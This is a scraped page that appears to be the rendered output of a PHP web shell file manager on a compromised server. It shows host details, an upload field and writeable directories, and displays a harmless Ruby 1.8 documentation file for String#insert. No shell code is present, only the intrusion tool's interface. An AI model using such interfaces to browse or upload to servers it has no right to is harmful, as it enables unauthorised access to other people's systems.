Server : LiteSpeed
System : Linux server51.dnsbootclub.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User : nandedex ( 1060)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /opt/alt/ruby18/share/ri/1.8/system/String/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Current File : //opt/alt/ruby18/share/ri/1.8/system/String/insert-i.yaml
--- !ruby/object:RI::MethodDescription 
aliases: []

block_params: 
comment: 
- !ruby/struct:SM::Flow::P 
  body: Inserts <em>other_str</em> before the character at the given <em>index</em>, modifying <em>str</em>. Negative indices count from the end of the string, and insert <em>after</em> the given character. The intent is insert <em>aString</em> so that it starts at the given <em>index</em>.
- !ruby/struct:SM::Flow::VERB 
  body: "   &quot;abcd&quot;.insert(0, 'X')    #=&gt; &quot;Xabcd&quot;\n   &quot;abcd&quot;.insert(3, 'X')    #=&gt; &quot;abcXd&quot;\n   &quot;abcd&quot;.insert(4, 'X')    #=&gt; &quot;abcdX&quot;\n   &quot;abcd&quot;.insert(-3, 'X')   #=&gt; &quot;abXcd&quot;\n   &quot;abcd&quot;.insert(-1, 'X')   #=&gt; &quot;abcdX&quot;\n"
full_name: String#insert
is_singleton: false
name: insert
params: |
  str.insert(index, other_str)   => str

visibility: public

F1le Man4ger